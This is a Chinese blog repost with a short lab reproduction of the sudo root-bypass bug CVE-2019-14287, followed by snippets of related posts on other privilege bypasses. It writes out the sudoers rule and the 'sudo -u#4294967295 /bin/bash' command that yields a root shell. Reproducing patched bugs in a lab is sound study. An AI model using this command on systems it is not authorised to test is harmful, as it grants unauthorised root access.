(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

1:查看测试机sudo版本号,确认是受影响版本。


2:创建账号test


3:进入/etc,备份一下sudoers到/root,然后修改sudoers内容,添加:

test  ALL=(ALL,!root) /bin/bash




4:登录test账号,

sudo -u#4294967295 /bin/bash

受影响的Sudo版本:

1.8.28之前的Sudo版本会受到影响。

=======================================
参考链接:
https://www.sudo.ws/alerts/minus_1_uid.html
https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA
https://mp.weixin.qq.com/s/1-WQSiB1Yc_sPYh928TXkw

原文地址:https://www.cnblogs.com/SzSecNote/p/11679345.html

时间: 2024-10-08 22:16:57

(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现的相关文章

PJzhang:CVE-2019-14287 sudo权限绕过漏洞复现

猫宁!!! 参考链接:Ms08067实验室公众号 sudo 1.8.28版本之前有漏洞,很鸡肋的. 更新完kali linux,deepin截图工具失效,只能用自带的,不能划重点. 看一下sudo版本,1.8.23,centos7上操作. 设置密码1234qwer cat /etc/passwd vim /etc/sudoers,test ALL=(ALL,!root) /usr/bin/vim是新添加的,表示test这个用户不是root组,但 切换到test用户 显示如下 就是在冒号后面,加个

在linux取得root权限

在ubuntu中其实root账户是存在的,只是需要我们给它设置一个密码,然后使用的时候用root用户名登陆,然后输入对应的密码就就以root用户登录了,所以开启root账户,实际上就是给root用户设置一个密码的过程,下面我们就来给root设置密码,另外还需要注意的是,只能使安全ubuntu系统的时候创建的用户账号才能启用root账号,使用下面的命令来给root账号设置密码: sudo passwd root // 在linux取得root权限,布布扣,bubuko.com

Python 实现 Discuz论坛附件下载权限绕过漏洞

背景:最近压力有些大,想玩点游戏放松下,去Mac论坛下载,发现需要各种权限,于是蛋疼了. 所以,上网查了discuz! x3.1破解,手动替换,发现出现“链接已过期”.所以写了下面程序. 0.将下列代码复制到你的python IDE中. 1.先进网页,chrome浏览器查看网页元素,替换正则表达式内内容. 2.刷新你要下载的页面,右键复制下载链接 url = ‘你复制的链接’ 3.运行python,你的IDE里面就会打印出真实下载地址. 运行环境:python3.5 操作系统:macpro 20

利用Vulnhub复现漏洞 - Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

漏洞原理:Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库.应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序). 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12

亚马逊云VPS AWS更改LINUX为ROOT权限密码登陆

LINUX VPS没有ROOT权限是很难受的事,并且密码登陆也方便一些.我的AWS VPS的LINUX版本是UBUNTU 13.10,首先用AWS证书验证的账户登录, 1.修改ROOT密码sudo passwd root 2.sudo chmod 777 /etc/ssh/sshd_config用完再把权限改回来 3.vi /etc/ssh/sshd_configPermitRootLogin这行改为PermitRootLogin yesPasswordAuthentication no上面的n

CVE-2019-13272:Linux本地内核提权漏洞复现

0x00 简介 2019年07月20日,Linux正式修复了一个本地内核提权漏洞.通过此漏洞,攻击者可将普通权限用户提升为Root权限. 0x01 漏洞概述 当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数.但是,对象struct cred的生存周期规则不允许无条件地将RCU引用转换为稳定引用. PTRACE_TRACEME获取父进程的凭证,使其能够像父进程一样执行父进程能够执行的各种操作.如果恶意低权限子进程使

linux无root权限安装screen

基本参考:https://blog.csdn.net/qq_27262727/article/details/103753634 screen 安装包下载: wget -c https://ftp.gnu.org/gnu/screen/screen-4.8.0.tar.gz 解压文件 tar -xzvf screen-4.8.0.tar.gz #新建/home/ysj/Install目录 mkdir Install #进入安装包目录 cd screen-4.8.0/ #在安装包目录下,新建bui

如何让应用程序获取system权限、root权限

获取system权限 上一篇随笔简单介绍了下Android权限的一些规则,我们发现很多事如果没有system权限基本上无法完成,那么如何让自己的应用获取system权限呢? 一般情况下,设定apk的权限,可在AndroidManifest.xml中添加android:sharedUserId="android.uid.xxx> 例如: 给apk添加system权限 1 <manifest xmlns:android="http://schemas.android.com/a

Couchdb垂直权限绕过到命令执行

0x00couchdb简介 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库.应用广泛. 0x01两个漏洞的关系及原理 CVE-2017-12635垂直越权: CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的.这个漏洞可以让任意用户创建管理员,属于